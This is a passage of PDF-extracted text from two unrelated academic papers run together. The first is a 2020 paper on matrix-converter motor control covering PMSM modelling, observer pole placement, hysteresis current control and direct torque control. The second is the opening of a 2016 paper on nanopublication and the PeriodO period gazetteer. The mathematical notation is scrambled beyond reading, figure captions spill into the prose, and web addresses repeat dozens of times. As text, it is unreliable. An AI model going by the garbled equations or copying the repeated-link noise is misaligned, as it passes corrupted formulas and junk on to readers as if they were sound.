International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 55 current, the voltage caused by filter inductor should be drop the minimum to reduce adverse effects to voltage transfer ratio. M 3~ S11 S12 S13 S21 S22 S23 S31 S32 S33 S Mains Filter ConverterMatrix Circuit Clamp otorInductionM fg L m L   dc C R VT f C Figure 1. The topology of the matrix converter motor system III. MATRIX CONVERTER CONTROL STRATEGIES AND MOTOR CONTROL STRATEGIES Three-phase / three phase matrix converter consists of 9 two-way switches. Two basic principles of Matrix Converter Control Strategies as follows: Two input phase can not be connected meanwhile to an output phases to prevent short circuits; any output phase must ensure that an input is linked in order to prevent inductive load open circuit. Constraints in the above principles, matrix converter has a total of 27 switch states. Matrix converter control strategy has switch function method, dual-voltage vector method, space vector modulation method and hysteresis current tracking method. Switching function method is calculated the duty cycle of 9 switches by the relationship between the actual inputs of inverter and the input requirements[6]. Dual voltage synthesis method is in each switching cycle, used linear combinations of the two input lines voltage to synthesize output line voltage of two phase law[7]. Space vector modulation method is based on the virtual DC link ideas, the matrix converter is equivalent to the dual PWM converter of abolition DC link, and used space vector modulation to both rectifier link and inverter link which equivalent AC - DC - AC structure, and then back to matrix converter[8]. Hysteresis current tracking method use hysteresis track on the output current to track the reference current[9]. Motor control strategy has VVVF control, vector control and direct torque control. Through the speed regulator, VVVF control can achieve closed loop of speed; Vector control to achieve double closed loop of rotate speed and torque component of stator current, in which rotate spend loop is the outer ring, torque component of stator current for the inner ring; Direct torque control achieve double-loop of speed and torque; where speed loop for the outer ring, the torque for the inner ring. IV. MATHEMATICAL MODEL OF PMSM For the vectors relationship between flux voltage and current in permanent magnet synchronous motor, d, q coordinate system fixed in the rotor coordinate system; x, y coordinate system fixed to the stator rotating coordinate system, stator flux  T qd  , as state vector, stator current T qd iii },{ as output vector, T fqd uuU },,{  as the input vector. So the motor properties model can be rewritten in matrix form as follows:                                                f q d d s q d q s e e d s q d x u u L R L R L R d d        010 01                                            f q d d q d q d q d u u L L L i i    000 1 00 1 0 0 1 qd  , are the axis flux; qd uu , are the axis voltage. V. THE STATOR FLUX BASED ON FULL- DIMENSIONAL STATE OBSERVER A. structure of stator flux full-dimensional state observer In practice, there is not all state variables can be measured directly, so we can reconstruct state variables by variables can be measure in system to construct a system identical to the original artificially system. The system is constructed artificially, so its state variables can be measured completely. Construction System:           sss sss DuCi BuA   International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 56  s  is the state vector for estimated value of s  which original system actual vector need to observe.                q s e e d s L R L R A   ,          010 01 d s L R B              q d L L C 1 0 0 1 ,           000 1 00 d LD T sqsds          ,  Tfsqsds uuu  ,  T sqsds iii  so: )(    ssss A  solution:         )0()0( ss At ss e  Known by the above equation: When )0()0(   ss  , that ss    . However, in general, to ensure initial conditions identical at any time is impossible. Therefore, in order to eliminate state error, we can introduce error feedback )(   ss  according to the basic principles of control theory, that is, error feedback )(   ss ii . The advantages of introduces feedback terms as follows: firstly, when the initial state s  and  s  have a deviation, it can control the deviation not diffusion or shock with time increase; secondly, it can overcome the shortcomings of the open-loop observer can not be adjusted when matrix A changes that made the deviations of s  and  s  more worse. The state estimation error of observer can be obtained from Figure 1 is ( )ˆ ˆe [ (0) (0)]t s s s s     A GC ψ ψ ψ ψ . Clearly, as long as the eigenvalues of coefficients (A GC) of chosen observer all have negative real parts, it can make state estimated value ˆ s ψ incremental approach to the real value s ψ . B. Pole Placement The pole of observer is the eigenvalues of )( GCA  which is important to observer performance. Usually pole placement of observer should make the response speed of observer faster than the system model. That can make the observation error fast convergence. To get the eigenvalues of )( GCA  , this paper used induction motor pole configuration method in documents, that is the method of pole placement of observer configured direct proportional to motor model. Consider the poles of motor, that is, the eigenvalues of 0 AsI that eigenvalues of the following formula: 0)( 22  e q s d s q s d s L R L R s L R L R s  Two poles can be got: 2 )(4)()( 22 1 e q s d s q s d s q s d s L R L R L R L R L R L R s   2 )(4)()( 22 2 e q s d s q s d s q s d s L R L R L R L R L R L R s   ( 1j ) Set observer poles is k times than motor poles, that is, 1 1 ·OS k S 2 2 ·OS k S The position of the motor poles and observer’s poles k =1.2 in the article. Using the powerful scientific computing advantages of Matlab and control system toolbox, according to the robust pole assignment algorithm and equation, the gain matrix of the observer G can be solved. Among them, P is the desired observer pole vector. ( ) 'placeG A', C', P VI. CONTROL STRATEGY OF MATRIX CONVERTER MOTOR SYSTEM Control Strategy of Matrix Converter Motor System is essentially a combination of matrix converter control and motor control. A. Matrix Converter Space Vector and Motor VVVF Control The current study generally is matrix converter space vector and motor VVVF control. VVVF control obtained the amplitude and frequency of reference International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 57 output voltage, matrix converter space vector modulation of matrix converter achieved input power factor correction and output voltage generation. This only on the speed closed-loop, it can not meet the speed requirements of high-performance motor system. Because in the space vector modulation, the duty cycle calculation is entirely based on ideal input and expectations output, it unrelated to the actual input and output and non- suppression to harmonic, robustness of the input, voltage space vector can be introduced as a negative feedback to closed loop control[10]. B. Hysteresis Current Comparative Method Hysteresis current comparison method can combine with vector control, namely use vector control to the motor and obtain the stator three-phase reference current to control matrix converter by using hysteresis current comparison method, which specific realization can be divided into indirect and direct method by whether to adopt the virtual DC link thought. Concrete realization of the direct method as follows: When hysteresis current comparator requires to increase a phase current, at this time turn-on the input voltage maximum phase; when hysteresis current comparator requires to decrease a phase current, at this time turn-on the input voltage minimum phase[11]. Indirect method is the matrix converter equivalent to the AC - DC - AC structure of abolition of DC link, in which hysteresis current comparison method control inverter part, and output voltage of the rectifier linkUpn is the DC bus voltage of inverter link. DC bus voltage of equivalent AC - DC - AC structure is a three-phase input line voltage and fluctuate range from zero to the maximum of input line voltage. Therefore, the DC bus voltage of equivalent AC - DC - AC structure is present of high, middle and low range of options. The range of high voltage including [0.866 maxU , maxU ], the range of middle voltage including [0.5Umax, 0.866Umax], the range of low voltage including [0, 0.5 maxU ], maxU is the maximum of input line voltage. It can be seen that the direct method is essentially an indirect method of DC bus select the high voltage. Hysteresis current comparison method set up the premise that the DC bus voltage is greater than the motor stator EMF. When the DC bus voltage of the matrix converter is equivalent to the AC - DC - AC structure is small, there may be turn up the situation of the DC bus voltage less than the stator EMF. At this point, hysteresis current comparison method to actual control on the current effect opposite to expectations and consequently exacerbated, this will increase current and torque ripple and reduce system performance. Therefore, the DC bus voltage chooses generally high voltage. Simulate research to matrix converter motor system vector control of adopted hysteresis current comparison method using Matlab/Simulink. In which DC bus voltage use high voltage and motor use the three-phase four-pole squirrel-cage induction motor. Rs = 0.087Ω, Rr = 0.228Ω, Ls = Lr = 8mH, Lm = 34.7mH and current hysteresis width is 2A. Initialize torque as the value of 0N.m, 1.5S step to 200N.m; speed set 120rad / s. Speed controller adopt PID controller. Simulation waveform of vector Control of Matrix Converter Motor System is shown in Figure 2 to Figure 3. Figure 2. The rev and torque of motor Figure 3. The stator electrical current of A The control of the rectifier part is only provided DC bus voltage to the inverter, actually we can through adopt space vector modulation to achieved power factor correction to the input the rectifier, but there is a International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 58 problem that when the output voltage as middle voltage or zero voltage in the rectification part, hysteresis current comparative method in the inverter failure and thus effect the vector control. The waveform of rectifier link using space vector modulation simulation is shown in Figure 4 to Figure 5. Space vector modulation can also be combined with vector control, stator reference current obtain by vector control convert into the stator reference voltage, using space vector modulation, input power factor get from rectification links and inverter part generated the requirements reference voltage[12]. C. Direct Torque Control The combination of direct torque control and matrix converter control can be interpreted using matrix converter output voltage space vector. Figure 4. The rev and torque of motor Figure 5. The stator electrical current of A Three-phase / three phase matrix converter has a total of 27 switch states and corresponds to the 27 voltage vectors. They can be divided into three categories: ①zero voltage vector; ②amplitude changes, voltage vector of constant phase angle; ③ fixed amplitude, voltage vector of phase angle. Direct torque control to qualitative control of torque and stator flux amplitude by using hysteresis comparator. The phase angles of voltage vector determine its nature of the role of change stator flux and torque and amplitude determine the size. The fluctuation of voltage vector amplitude does not affect the feasibility of direct torque control. For the third type of voltage vector, system requires real-time information of voltage vector phase angle to determine its change role to torque and flux. In order to reduce the burden on the system, the matrix converter motor direct torque control system generally select only the first and second voltage vector. Therefore, there are three different voltage vector amplitude has the same phase angle any time, the presence of high, medium and low options. Following paper will analyses high, medium and low voltage vector effect on the system performance. Because the same sampling time, the higher voltage vector magnitude, the greater torque ripple caused, dynamic performance is proportional to voltage vector amplitude. Figure 6. The torque and rev of motor Figure 7. The error of torque ΔTe International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 59 The torque ripple of direct torque control system can be divided into two categories: First, in the constant sampling period, the torque ripple caused by discrete is proportional to the input line voltage amplitude. Second, torque ripple caused by the failure of the direct torque control. Direct torque control to select the forward voltage vector and increase rotor flux by increasing the angle between stator and torque. This requires the speed of stator flux rotate faster than the rotor flux. Stator flux rotation speed determined by the input line voltage, so when the input line voltage is small, it will apparent the situation of increases the torque by select a system voltage vector but the actual torque decline contrary. The size of the torque ripple and the frequency is inversely proportional to the input line voltage amplitude. Studies show that the high- voltage vector does not appear the failure situation of direct torque control, while medium and low voltage vectors both appearances. Thus, high-voltage vector generally be chosen. Simulate research to direct torque control by using the matrix converter motor system of high-voltage vector and the simulation results shown in Figure 6 to Figure 7. By selecting the high and medium voltage vector to reduce the torque ripple of direct torque control system, the specific is that select the input line voltage is high when the system is in dynamic; select the input line voltage is middle when the system is in stable, when in the case of failure of direct torque control, select the input line voltage is high and determine the system state according to the size of the torque ripple. Simulated research to the matrix converter motor direct torque control system using this strategy and the simulation results shown in Figure 8 to Figure 9. Figure 8. The torque and rev of motor Figure 9. The error of torque ΔTe By comparison Figure 7 and Figure 9 shows that this improvement strategy can reduce the torque ripple effectively. In the rectifier link space vector modulation similar to vector control indirect method. The matrix converter is equivalent to the AC - DC - AC structure, control rectifier link using direct torque control and use space vector modulation to inverter link. VII. CONCLUSION This paper proposed the concept of matrix converter motor system aimed at the problems of the matrix converter enter into industrial applications and research the matrix converter motor system control strategy combined matrix converter control method and motor speed method, analyzed the impact of the size of the voltage vector to hysteresis current comparator and direct torque control, and proposed to the improved control strategies of reduce the torque ripple and consider the input power factor control. ACKNOWLEDGMENT The authors wish to thank the cooperators. This research is partially funded by the Project funds in Shaanxi province University Student Innovation and Entrepreneurship Fund Project (S201910702064 ) and the Project funds in engineering laboratory project(GSYSJ2018012). REFERENCES [1] P. W. Wheeler, R. Jose, C. Jon, et al. Matrix converters: a technology review [J]. IEEE Trans. on Industrial Electronics, 2002, 49(2): 276~288. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 60 [2] Li Yao-hua and so on. an effective way to improve voltage transfer ratio of matrix converter [J]. Electric Automation, 2006, 28 (5): 32 ~ 35. [3] Guo Qian-gang, Li Yao-hua, Meng Yan-jing etc. the theoretical analysis and discuss of matrix converter voltage transfer ratio [JElectric Automation, 2004, 26 (4): 55 ~ 57. [4] Huang Ke-yuan, He Yi-kang, Bian Song-jiang. Variable speed, constant frequency, and wind power system research of matrix converter AC excitation [J]. CSEE, 2002, 22 (11): 100 ~ 105. [5] C. Klumpner, P. Nielsen, I. Boldea, et al. A new matrix converter motor (MCM) for industry applications [J]. IEEE Trans. on Industrial Electronics, 2002, 49(2): 325~335. [6] A. Alesina, M. Venturini. Analysis and design of optimum amplitude nine-switch direct AC-AC converters [J]. IEEE Trans. on Power Electronics, 1989, 4(1): 101~112. [7] Wang Yi, Chen Xi-you, Xu Dian-guo. Research to two voltage synthesis matrix converter loop control [J]. CSEE, 2002, 22 (1): 74 ~ 79. [8] L. Huber, D. Borojevic. Space vector modulated three phase to three phase matrix converter with input power factor correction [J]. IEEE Trans. on Industry Applications, 1995, 31(6): 1234~1245. [9] Zhang Zhi-xue, Ma Hao. The current control strategy of matrix converter [J]. CSEE, 2004, 24 (8): 61 ~ 66. [10] Wang Yi, Chen Xi-you, Xu Dian-guo. Research of Space vector modulated matrix converter closed-loop control [J]. CSEE, 2003, 23 (6): 164 ~ 169. [11] Ge Hong-juan, Mu Xin-hua, Zhang Shao etc. Permanent Magnet Synchronous Motor Vector Control Model and Simulation based on Matrix Converter [J]. Mining Technology University of China, 2005, 34 (3): 333 ~ 337.. [12] Sun Kai, Huang Li-pei, Song Ta Gong-gui. Induction Motor Vector Control based on Matrix Converter [J]. Tsinghua University, 2004, 44 (7): 909 ~ 912. work_gxjya3n3c5hhfc6rz2sbb333eq ---- Nanopublication beyond the sciences: the PeriodO period gazetteer Submitted 3 August 2015 Accepted 5 January 2016 Published 3 February 2016 Corresponding author Patrick Golden, ptgolden@email.unc.edu Academic editor Edward Fox Additional Information and Declarations can be found on page 16 DOI 10.7717/peerj-cs.44 Copyright 2016 Golden and Shaw Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Nanopublication beyond the sciences: the PeriodO period gazetteer Patrick Golden and Ryan Shaw School of Information and Library Science, University of North Carolina at Chapel Hill, Chapel Hill, NC, United States ABSTRACT The information expressed in humanities datasets is inextricably tied to a wider discursive environment that is irreducible to complete formal representation. Humanities scholars must wrestle with this fact when they attempt to publish or consume structured data. The practice of “nanopublication,” which originated in the e-science domain, offers a way to maintain the connection between formal representations of humanities data and its discursive basis. In this paper we describe nanopublication, its potential applicability to the humanities, and our experience curating humanities nanopublications in the PeriodO period gazetteer. Subjects Digital Libraries, World Wide Web and Web Science Keywords Nanopublication, Periodization, Scholarly communication, Time, Linked data, JSON-LD INTRODUCTION Humanities scholars who wish to make their research materials usable with networked digital tools face a common dilemma: How can one publish research materials as “data” without severing them from the ideas and texts that originally gave them meaning? The kinds of information produced in the humanities—biographical details, political and temporal boundaries, and relationships between people, places, and events—are inextricably tied to arguments made by humanities scholars. Converting all, or even much, of the information expressed in scholarly discourse into algorithmically processable chunks of formal, structured data has so far proven to be extraordinarily difficult. But rather than attempt to exhaustively represent her research, a scholar can promote small pieces of information within her work using the practice of nanopublication (Mons & Velterop, 2009). Nanopublications include useful and usable representations of the provenance of structured assertions. These representations of provenance are useful because they allow consumers of the published data to make connections to other sources of information about the context of the production of that data. In this way, they strike a balance between the needs of computers for uniformity in data modeling with the needs of humans to judge information based on the wider context of its production. An emphasis on connecting assertions with their authors is particularly well-suited for the needs of humanities scholars. By adopting nanopublication, creators of datasets in the humanities can focus on publishing small units of practically useful, curated assertions while keeping a persistent pointer to the basis of those claims—the discourse of scholarly publishing itself—rather than its isolated representation in formal logic. How to cite this article Golden and Shaw (2016), Nanopublication beyond the sciences: the PeriodO period gazetteer. PeerJ Comput. Sci. 2:e44; DOI 10.7717/peerj-cs.44 mailto:ptgolden@email.unc.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.44 http://dx.doi.org/10.7717/peerj-cs.44 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.44 We offer as an example of this approach the PeriodO period gazetteer, which collects definitions of time periods made by archaeologists and other historical scholars (http: //perio.do). A major goal of the gazetteer was to make period definitions parsable and comparable by computers, while also retaining links to the broader scholarly context in which they were conceived. We found that a nanopublication-centric approach allowed us to achieve this goal. In this paper, we describe the concept of nanopublication, its origin in the hard sciences, and its applicability to the humanities. We then describe the PeriodO period gazetteer in detail, discuss our experience mapping nonscientific data into nanopublications, and offer advice to other humanities-oriented projects attempting to do the same. NANOPUBLICATIONS Nanopublication is an approach to publishing research in which individual research findings are modeled as structured data in such a way that they retain information about their provenance. This is in contrast to both traditional narrative publishing, where research findings are not typically published in a structured, computer readable format, and “data dumps” of research findings which are typically published without any embedded information about their origin or production. The nanopublication approach is motivated by a desire to publish structured data without losing the wider research context and the benefits of traditional scholarly communication (Groth, Gibson & Velterop, 2010). Nanopublication emerged from work in data-intensive sciences like genomics and bioinformatics, where recent advances in computational measurement techniques have vastly lowered the barrier to collecting genetic sequencing data. As a result, millions of papers have been published with findings based on these new methods. However, the reported results are almost always published in the form of traditional narrative scholarly publications (Mons et al., 2011). While narrative results can be read and understood by humans, they are not so easily digested by computers. In fields where computation has been the key to the ability to ask new and broader questions, it should surely be the case that research results are published in such a way that they are able to be easily parsed, collected, and compared by computer programs and the researchers who use them. On the occasions when research data are released and shared, they are often distributed on their own, stripped of the context necessary to locate them within a broad research environment (the identity of the researchers, where and how this research was conducted, etc.). In this case, publishing practice has swung too far to the opposite extreme. In the service of creating and sharing discrete datasets, the published results have been stripped of their provenance and their position within the wider scholarly endeavor that culminated in their publication. This contextual information is crucial for researchers to determine the trustworthiness of the dataset and learn about the broader project of research from which they resulted. Nanopublication offers a supplementary form of publishing alongside traditional narrative publications. A nanopublication consists of three parts, all representable by RDF graphs: Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 2/18 https://peerj.com/computer-science/ http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://dx.doi.org/10.7717/peerj-cs.44 1. An assertion (a small, unambiguous unit of information) 2. The provenance of that assertion (who made that assertion, where, when, etc.) 3. The provenance of the nanopublication itself (who formed or extracted the assertion, when, and by what method) The formal definitions of these parts are specified by an OWL ontology (Groth et al., 2013). By representing their research in nanopublications alongside their narrative reports, researchers can publish their data in such a way that the data remain within their human context while also being easily digested by computer programs. Authors are encouraged to include the smallest possible unambiguous pieces of information as the assertions at the center of a nanopublication. In the bioscience context, these assertions could range from statements of causality, to measurements of gene expressions or gene-disease associations, to statistics about drug interactions. The scope and nature of appropriate units of nanopublication inevitably vary by discipline. Multiple statements of identical or closely related facts can be connected with different sources of provenance, thereby potentially augmenting the ability of consumers to judge the quality of assertions. Groth, Gibson & Velterop (2010) call the collection of nanopublications all referring to the same assertion “S-evidence,” and cite the potential benefits of the ability to automatically connect findings across research publications. Several European repositories of bioinformatic data have begun to publish their con- tents as nanopublications, including the Biosemantics Group (http://www.biosemantics. org), neXtProt (http://nextprot.org/), and DisGeNET (http://www.disgenet.org/web/ DisGeNET/v2.1). These publications can be aggregated and connected in larger systems, such as the decentralized reputation system described by Kuhn (2015). NANOPUBLICATION IN THE HUMANITIES While the bioinformatics research community has enthusiastically adopted nanopub- lication, other disciplines have been slow to follow. Gradmann (2014) suggested that specialized and stable terminologies, as well as sufficient funding to organize these terminologies in formal ontologies, may be prerequisites for the successful deployment of nanopublication. Thus while he expects other scientific, technical, and medical disciplines to eventually embrace nanopublication, he is less sure that nanopublication will work for the humanities. Historians, for example, use relatively little specialized terminology and pride themselves on their ability to use “ordinary language” to represent the past. Even when humanities scholars use specialized theoretical language, their use of this language is often unstable, ambiguous, and highly contested. Perhaps, then, a publishing technique that seeks to eliminate such ambiguity is ill-suited for these fields. A related obstacle to the adoption of nanopublication beyond the hard sciences has to do with differences in the role played by “facts.” Researchers trained in the hard sciences understand their work to be cumulative: scientists “stand on the shoulders of giants” and build upon the work of earlier researchers. While scientists can in principle go back and recreate the experiments of their predecessors, in practice they do this only when the results Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 3/18 https://peerj.com/computer-science/ http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://www.disgenet.org/web/DisGeNET/v2.1 http://dx.doi.org/10.7717/peerj-cs.44 of those experiments have not been sufficiently established as facts. Efficient cumulative research requires that, most of the time, they simply trust that the facts they inherit work as advertised. Something like this process seems to be assumed by many proponents of nanopublications. For example, Mons & Velterop (2009) claim that a major goal of nanopublication is to “elevate” factual observations made by scientists into standardized packages that can be accumulated in databases, at least until they are proved wrong. These standardized packages can then be automatically or semi-automatically analyzed to produce new factual observations (or hypotheses about potential observations), and the cycle continues. Yet as Mink (1966) observed, not all forms of research and scholarship are aimed at producing “detachable conclusions” that can serve as the basis for a cumulative process of knowledge production. Anticipating Gradmann, Mink argued that Detachable conclusions are possible in science because—and only because—of its theoretical structure. The division of labor in research requires that concepts have a uniformity of meaning, and the methodological problem of definition therefore becomes central (Mink, 1966, 39). Mink contrasted science to the study of history, which, lacking both explicit methodology and uniform consensus on the meanings of its concepts, does not produce “detachable conclusions.” But this does not mean that historical scholarship fails to produce knowl- edge, only that it is a separate and autonomous mode of understanding. The goal of most historical scholarship is not to establish conclusions by constructing an explanatory chain of inferences from evidence. Rather the goal is to render what Mink called a “synoptic judgment,” an interpretive act in which the scholar comes to “see together” the disparate observable elements of some phenomena as a synthetic whole. The historian who judges the advent of printing to have constituted a “communications revolution” (Eisenstein, 1979) has not made an inference from the available evidence but has constructed a particular interpretation of that evidence. To communicate her synoptic judgment to others, she cannot simply state her conclusions unambiguously and rely on her audience’s theoretical understanding to make them meaningful; instead she must arrange and exhibit the evidence to help them “see together” what she saw. So is nanopublication a poor fit for fields of knowledge production that do not follow the model of cumulative science? We believe the answer is no. First of all, even Mink did not argue that there were no facts in history, only that the significant conclusions drawn by historians do not typically take the form of factual statements. There are plenty of equivalents in history and the humanities to the databases of curated factual statements that exists in the sciences: prosopographical databases (Bradley & Short, 2005), digital historical gazetteers (Elliott & Gillies, 2011), not to mention the catalogs and indexes of bibliographical data that make humanities scholarship possible (Buckland, 2006). Some of these facts may be vague or uncertain, but as Kuhn et al. (2013) observe, even knowledge that cannot be completely formally represented, including vague or uncertain scientific findings, can benefit from the nanopublication approach. We agree but would go further Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 4/18 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.44 to say that nanopublication is useful even for information that is neither testable nor falsifiable, exemplified by Mink’s synoptic judgments. We have demonstrated the utility of nanopublications for describing synoptic judgments of historical periodization in the PeriodO period gazetteer, which we describe below. THE PERIODO PERIOD GAZETTEER In their work, archaeologists and historians frequently refer to time periods, such as the “Classical Iberian Period” or the “Progressive Era.” These time periods are shorthand representations of commonly referenced segments of time and space. While time periods might have commonly understood definitions, they are typically scattered throughout myriad publications and are treated as shared, assumed knowledge. This leads to difficulty and repeated effort when scholars want to visualize their data in space and over time, which requires mapping these discursive period labels to discrete spatiotemporal ranges (Rabinowitz, 2014). To build the PeriodO gazetteer, we compiled thousands of definitions of time periods from published sources within the fields of archaeology, history, and art history. We mapped these time periods to a consistent data model and published them as linked open data (Heath & Bizer, 2011) so that future scholars would be able to link their uses of period terms to information about the provenance of those terms. A web-based faceted browsing interface allows scholars to find and compare period definitions (see Fig. 3), or software developers can use the PeriodO data directly in their own systems. The gazetteer is editable via HTTP; contributors can submit proposed changes in the form of patches, and the PeriodO editors can accept or reject them. All proposed and accepted changes are stored, and each period definition has a history of changes in the form of patch submissions and approvals (Shaw et al., 2015). To ease the process of creating patches that conform to the PeriodO data model, we developed an editing interface that runs in a standard web browser (see Fig. 4). Data model PeriodO defines a “period definition” as a scholarly assertion about the name and spatiotemporal extent of a period. The core of a period definition consists of text quoted from the original source indicating the name of the period, its temporal range, and the geographic region to which it applies. Multiple period definitions from the same source are grouped into a period collection. For example, the article “Domestic Architecture and Social Differences in North-Eastern Iberia during the Iron Age (c.525–200 BC)” includes the following sentence: For the Catalan area, the complete system with the four above-mentioned categories is not as clearly documented before the fourth century as it is during the Classical Iberian Period (400–200 BC), although differences in the size of the sites, as well as the specialization of the functions of some settlements, can be already detected during the Early Iberian Period (525–400 BC) (Belarte, 2008). Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 5/18 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.44 This sentence contains two assertions defining period extents, so it is modeled in PeriodO as two period definitions. The first definition has the label “Classical Iberian Period” and its start and end points are labeled as “400 BC” and “200 BC” respectively. The second definition has the label “Early Iberian Period” and its start and end points are labeled as “525 BC” and “400 BC” respectively. The spatial extent of both definitions is labeled as “Catalan area”. All of these labels are taken verbatim from the source text and should never change. Because they come from the same source, these two period definitions are grouped into a period collection. The bibliographic metadata for the source article is associated with this period collection. (In the event that a source defines only a single period, then the period collection will be a singleton.) Belonging to the same period collection does not imply that period definitions compose a periodization. A periodization is a single coherent, continuous division of historical time, each part of which is labeled with a period term. A period collection, on the other hand, is simply a set of period definitions that share the same source. When the period definitions in a period collection do compose a periodization, this can be indicated through the addition of statements relating the period definitions to one another, e.g., as belonging to the same periodization and having a specific ordering. Because source languages, dating systems, and naming of geographical regions can vary widely, labels taken verbatim from source documents are insufficient for indexing and visualizing period definitions in a uniform way. Thus the rest of the PeriodO data model consists of properties added by PeriodO curators to normalize the semantic content of these textual labels. First, all periods originally defined in a language other than English are given an alternate English-language label. When a period definition was originally defined in English, the alternate label may make minor changes for consistency. For example, Belarte’s definition of the “Classical Iberian Period” period was given an alternate label of “Classical Iberian”, removing the word “Period” for brevity and consistency with other definitions. Next, the specification of temporal start and end points is standardized by adding ISO 8601 lexical representations of proleptic Gregorian calendar years1: -0399 for 1 Proleptic refers to dates represented in some calendar system that refer to a time prior to that calendar’s creation. The Gregorian calendar was adopted in 1582, but most of our dates fall in years prior to that one. “400 BC” and -0199 for “200 BC”. Finally, descriptions of spatial extent are normalized by adding references to “spatial things”, typically modern nation-states. In this case both definitions are linked to the spatial thing identified by http://dbpedia.org/resource/Spain. The complete PeriodO representation in Turtle of Belarte’s collection of period definitions is given in Fig. 1.2 2 Turtle is a human-readable syntax for serializing RDF graphs (Carothers & Prud’hommeaux, 2014). PERIODO AS LINKED DATA We have taken pains to make it easy to work with the PeriodO dataset, particularly keeping in mind developers who do not use an RDF-based tool stack. The dataset is published as JSON, which is easily parsed using standard libraries in most programming environments including, of course, web browsers. But while JSON provides an easy and convenient way to work with the PeriodO dataset by itself, we knew that many users would want to combine it with the growing body of scholarly Linked Data being published on Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 6/18 https://peerj.com/computer-science/ http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain http://dbpedia.org/resource/Spain 